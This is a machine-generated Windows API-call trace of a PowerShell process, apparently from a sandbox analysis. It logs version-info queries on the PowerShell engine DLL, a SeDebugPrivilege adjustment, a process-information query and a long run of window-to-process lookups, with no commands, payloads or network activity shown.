	[0840.412] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0840.412] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0941.543] GetVersionExW (in: lpVersionInformation=0xedd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedd40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.545] GetVersionExW (in: lpVersionInformation=0xedd40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedd40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xeda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.556] GetVersionExW (in: lpVersionInformation=0xedab0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedab0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0941.558] SetErrorMode (uMode=0x1) returned 0x1
	[0941.559] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedc10 | out: lpFileInformation=0xedc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0941.559] SetErrorMode (uMode=0x1) returned 0x1
	[0941.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xede80 | out: lpdwHandle=0xede80) returned 0x94c
	[0941.570] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2de72f0 | out: lpData=0x2de72f0) returned 1
	[0941.824] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xeddf8, puLen=0xeddf0 | out: lplpBuffer=0xeddf8*=0x2de738c, puLen=0xeddf0) returned 1
	[0941.826] lstrlenW (lpString="䅁") returned 1
	[0941.833] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de7468, puLen=0xedd60) returned 1
	[0941.834] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0941.835] CoTaskMemAlloc (cb=0x2e) returned 0x35eee0
	[0941.835] lstrcpyW (in: lpString1=0x35eee0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0941.836] CoTaskMemFree (pv=0x35eee0) 
	[0941.836] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de74bc, puLen=0xedd60) returned 1
	[0941.836] lstrlenW (lpString="System.Management.Automation") returned 28
	[0941.836] CoTaskMemAlloc (cb=0x3c) returned 0x323330
	[0941.836] lstrcpyW (in: lpString1=0x323330, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0941.836] CoTaskMemFree (pv=0x323330) 
	[0941.836] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de7518, puLen=0xedd60) returned 1
	[0941.836] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.836] CoTaskMemAlloc (cb=0x20) returned 0x364560
	[0941.836] lstrcpyW (in: lpString1=0x364560, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.836] CoTaskMemFree (pv=0x364560) 
	[0941.836] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de7558, puLen=0xedd60) returned 1
	[0941.836] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.836] CoTaskMemAlloc (cb=0x44) returned 0x323330
	[0941.836] lstrcpyW (in: lpString1=0x323330, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.836] CoTaskMemFree (pv=0x323330) 
	[0941.836] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de75c0, puLen=0xedd60) returned 1
	[0941.836] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0941.836] CoTaskMemAlloc (cb=0x76) returned 0x2ff100
	[0941.836] lstrcpyW (in: lpString1=0x2ff100, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0941.837] CoTaskMemFree (pv=0x2ff100) 
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de765c, puLen=0xedd60) returned 1
	[0941.837] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.837] CoTaskMemAlloc (cb=0x44) returned 0x323330
	[0941.837] lstrcpyW (in: lpString1=0x323330, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.837] CoTaskMemFree (pv=0x323330) 
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de76c0, puLen=0xedd60) returned 1
	[0941.837] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0941.837] CoTaskMemAlloc (cb=0x58) returned 0x32a660
	[0941.837] lstrcpyW (in: lpString1=0x32a660, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0941.837] CoTaskMemFree (pv=0x32a660) 
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de773c, puLen=0xedd60) returned 1
	[0941.837] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.837] CoTaskMemAlloc (cb=0x20) returned 0x364560
	[0941.837] lstrcpyW (in: lpString1=0x364560, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.837] CoTaskMemFree (pv=0x364560) 
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x2de73e4, puLen=0xedd60) returned 1
	[0941.837] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0941.837] CoTaskMemAlloc (cb=0x66) returned 0x2d1070
	[0941.837] lstrcpyW (in: lpString1=0x2d1070, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0941.837] CoTaskMemFree (pv=0x2d1070) 
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x0, puLen=0xedd60) returned 0
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x0, puLen=0xedd60) returned 0
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedd68, puLen=0xedd60 | out: lplpBuffer=0xedd68*=0x0, puLen=0xedd60) returned 0
	[0941.837] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedd38, puLen=0xedd30 | out: lplpBuffer=0xedd38*=0x2de738c, puLen=0xedd30) returned 1
	[0941.838] CoTaskMemAlloc (cb=0x204) returned 0x311fd0
	[0941.838] VerLanguageNameW (in: wLang=0x0, szLang=0x311fd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0941.840] CoTaskMemFree (pv=0x311fd0) 
	[0941.840] VerQueryValueW (in: pBlock=0x2de72f0, lpSubBlock="\\", lplpBuffer=0xedd88, puLen=0xedd80 | out: lplpBuffer=0xedd88*=0x2de7318, puLen=0xedd80) returned 1
	[0941.842] GetCurrentProcessId () returned 0x844
	[0941.853] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xeccb0 | out: lpLuid=0xeccb0*(LowPart=0x14, HighPart=0)) returned 1
	[0941.855] GetCurrentProcess () returned 0xffffffffffffffff
	[0941.856] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xeccd0 | out: TokenHandle=0xeccd0*=0x2d0) returned 1
	[0941.856] AdjustTokenPrivileges (in: TokenHandle=0x2d0, DisableAllPrivileges=0, NewState=0x2deab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0941.857] CloseHandle (hObject=0x2d0) returned 1
	[0941.863] EnumProcessModules (in: hProcess=0x2d0, lphModule=0x2deabd0, cb=0x200, lpcbNeeded=0xedce8 | out: lphModule=0x2deabd0, lpcbNeeded=0xedce8) returned 1
	[0941.865] GetModuleInformation (in: hProcess=0x2d0, hModule=0x13f370000, lpmodinfo=0x2deae40, cb=0x18 | out: lpmodinfo=0x2deae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0941.865] CoTaskMemAlloc (cb=0x804) returned 0x365600
	[0941.865] GetModuleBaseNameW (in: hProcess=0x2d0, hModule=0x13f370000, lpBaseName=0x365600, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0941.865] CoTaskMemFree (pv=0x365600) 
	[0941.866] CoTaskMemAlloc (cb=0x804) returned 0x365600
	[0941.866] GetModuleFileNameExW (in: hProcess=0x2d0, hModule=0x13f370000, lpFilename=0x365600, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0941.866] CoTaskMemFree (pv=0x365600) 
	[0941.866] CloseHandle (hObject=0x2d0) returned 1
	[0942.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x844) returned 0x2d0
	[0942.218] GetExitCodeProcess (in: hProcess=0x2d0, lpExitCode=0xede18 | out: lpExitCode=0xede18*=0x103) returned 1
	[0942.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12deb088, Length=0x20000, ResultLength=0xedde0 | out: SystemInformation=0x12deb088, ResultLength=0xedde0*=0x4a050) returned 0xc0000004
	[0942.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12e0b0b8, Length=0x4c850, ResultLength=0xedde0 | out: SystemInformation=0x12e0b0b8, ResultLength=0xedde0*=0x4a050) returned 0x0
	[0942.252] EnumWindows (lpEnumFunc=0x2af66ac, lParam=0x0) 
	[0942.525] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.525] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x558
	[0942.525] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.525] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.525] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.525] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x538
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x778
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x778
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x460
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.526] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4d0
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2440
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x24d8
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1aa4
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1ff0
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1a84
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1fb0
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1e10
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x23a8
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1f24
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x21ec
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2320
	[0942.527] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1fd4
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1880
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b18
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1d6c
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x233c
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2368
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2124
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x22f0
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x22ac
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1cdc
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x10f0
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1f18
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x20a8
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2004
	[0942.528] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1f88
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1f84
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x2050
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1e04
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1ecc
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1e64
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b58
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1e94
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1e28
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1df8
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1da8
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1c70
	[0942.529] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x163c
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1a10
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x186c
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1d74
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x4c8
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1960
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1ce4
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b24
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x14e0
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x17f0
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x854
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1268
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1624
	[0942.530] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b9c
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x16f4
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x145c
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x17d0
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1d28
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xcb8
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1190
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x3a8
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1bd0
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1bfc
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1a78
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b90
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b04
	[0942.531] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b34
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1b64
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1bb0
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1acc
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1a2c
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x19a8
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1944
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x18c8
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x18ac
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x18ec
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1898
	[0942.532] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0xc98
	[0942.533] GetWindow (hWnd=0x10810, uCmd=0x4) returned 0x0
	[0942.534] IsWindowVisible (hWnd=0x10810) returned 0
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x153c
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1808
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x12a4
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1740
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x16c4
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1820
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x16ac
	[0942.534] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xedb40 | out: lpdwProcessId=0xedb40) returned 0x1858
